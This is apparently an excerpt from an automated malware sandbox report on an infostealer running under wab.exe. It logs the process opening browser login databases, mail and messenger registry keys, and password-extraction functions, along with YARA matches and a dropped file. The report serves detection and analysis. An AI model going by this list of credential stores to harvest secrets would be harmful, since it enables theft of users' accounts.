Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: ESMTPPassword 14_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 14_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 14_2_00402DB3
Source: Yara match File source: Process Memory Space: wab.exe PID: 7140, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: Process Memory Space: wab.exe PID: 7140, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs